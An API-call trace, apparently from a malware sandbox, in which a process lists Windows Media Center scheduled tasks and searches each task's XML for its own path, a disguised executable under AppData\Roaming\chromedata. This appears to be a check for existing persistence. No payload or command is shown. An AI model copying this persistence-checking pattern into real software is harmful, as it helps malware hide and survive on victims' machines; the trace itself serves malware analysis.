	[0073.574] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURActivate</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-11)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;IU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURActivate</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.574] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.574] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0xa, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.574] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="OCURDiscovery") returned 0x0
	[0073.574] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURDiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURDiscovery $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.575] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\OCURDiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/OCURDiscovery $(Arg0)</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.576] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.576] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0xb, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.576] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscovery") returned 0x0
	[0073.576] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.577] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscovery</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <Hidden>false</Hidden>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.577] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.577] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0xc, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.577] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscoveryW1") returned 0x0
	[0073.577] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW1</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:7 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.578] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW1</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:7 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.579] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.579] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0xd, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.579] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PBDADiscoveryW2") returned 0x0
	[0073.579] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW2</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:90 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.580] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PBDADiscoveryW2</URI>\r\n    <Date>2005-08-30T13:30:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-10)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehPrivJob.exe,-14)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FXFR;;;NS)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"SystemAccount\">\r\n      <UserId>S-1-5-18</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"SystemAccount\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\ehPrivJob.exe</Command>\r\n      <Arguments>/wait:90 /PBDADiscovery</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.580] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.580] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0xe, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.580] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PeriodicScanRetry") returned 0x0
	[0073.580] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemRoot%\\ehome\\ehrecvr.exe,-104)</Source>\r\n    <Date>2008-07-06T05:40:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehrecvr.exe,-103)</Description>\r\n    <URI>\\Microsoft\\Windows\\Media Center\\PeriodicScanRetry</URI>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger id=\"Next Periodic Scan\">\r\n      <StartBoundary>2006-09-09T17:33:00</StartBoundary>\r\n      <Enabled>false</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%windir%\\ehome\\MCUpdate.exe</Command>\r\n      <Arguments>-pscn 0</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.582] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Source>$(@%systemRoot%\\ehome\\ehrecvr.exe,-104)</Source>\r\n    <Date>2008-07-06T05:40:00-08:00</Date>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehrecvr.exe,-103)</Description>\r\n    <URI>\\Microsoft\\Windows\\Media Center\\PeriodicScanRetry</URI>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <TimeTrigger id=\"Next Periodic Scan\">\r\n      <StartBoundary>2006-09-09T17:33:00</StartBoundary>\r\n      <Enabled>false</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n      <LogonType>InteractiveToken</LogonType>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>true</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>true</AllowHardTerminate>\r\n    <StartWhenAvailable>false</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>false</Enabled>\r\n    <Hidden>false</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <DisallowStartOnRemoteAppSession>false</DisallowStartOnRemoteAppSession>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT72H</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%windir%\\ehome\\MCUpdate.exe</Command>\r\n      <Arguments>-pscn 0</Arguments>\r\n    </Exec>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.582] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.582] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0xf, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
	[0073.582] IRegisteredTask:get_Name (in: This=0x22c1048, pName=0x128e3c | out: pName=0x128e3c*="PvrRecoveryTask") returned 0x0
	[0073.582] IRegisteredTask:get_Xml (in: This=0x22c1048, pXml=0x128e44 | out: pXml=0x128e44*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-129)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-130)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0073.583] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.3\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <URI>Microsoft\\Windows\\Media Center\\PvrRecoveryTask</URI>\r\n    <Version>1.0</Version>\r\n    <Description>$(@%systemRoot%\\ehome\\ehres.dll,-129)</Description>\r\n    <Source>$(@%systemRoot%\\ehome\\ehres.dll,-130)</Source>\r\n    <SecurityDescriptor>D:(A;;FRFWSDWDWO;;;BA)(A;;FRFWSDWDWO;;;SY)(A;;FRFWFXDTDCSDWD;;;NS)(A;;FXFR;;;AU)</SecurityDescriptor>\r\n  </RegistrationInfo>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Hidden>false</Hidden>\r\n    <WakeToRun>false</WakeToRun>\r\n    <UseUnifiedSchedulingEngine>true</UseUnifiedSchedulingEngine>\r\n  </Settings>\r\n  <Principals>\r\n    <Principal id=\"NetworkService\">\r\n      <UserId>S-1-5-20</UserId>\r\n      <LogonType>InteractiveToken</LogonType>\r\n      <RunLevel>LeastPrivilege</RunLevel>\r\n    </Principal>\r\n  </Principals>\r\n  <Actions Context=\"NetworkService\">\r\n    <Exec>\r\n      <Command>%SystemRoot%\\ehome\\mcupdate.exe</Command>\r\n      <Arguments>-PvrRecoveryTask</Arguments>\r\n    </Exec>\r\n    <ComHandler>\r\n      <ClassId>{7FA3A1C3-3C87-40DE-AC16-B6E2815A4CC8}</ClassId>\r\n      <Data><![CDATA[$(Arg1)]]></Data>\r\n    </ComHandler>\r\n  </Actions>\r\n</Task>", lpSrch="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe") returned 0x0
	[0073.584] IUnknown:Release (This=0x22c1048) returned 0x0
	[0073.584] IRegisteredTaskCollection:get_Item (in: This=0x55fed0, index=0x128d34*(varType=0x3, wReserved1=0x12, wReserved2=0xfe58, wReserved3=0x55, varVal1=0x10, varVal2=0x76fa8cd5), ppRegisteredTask=0x128e38 | out: ppRegisteredTask=0x128e38*=0x22c1048) returned 0x0
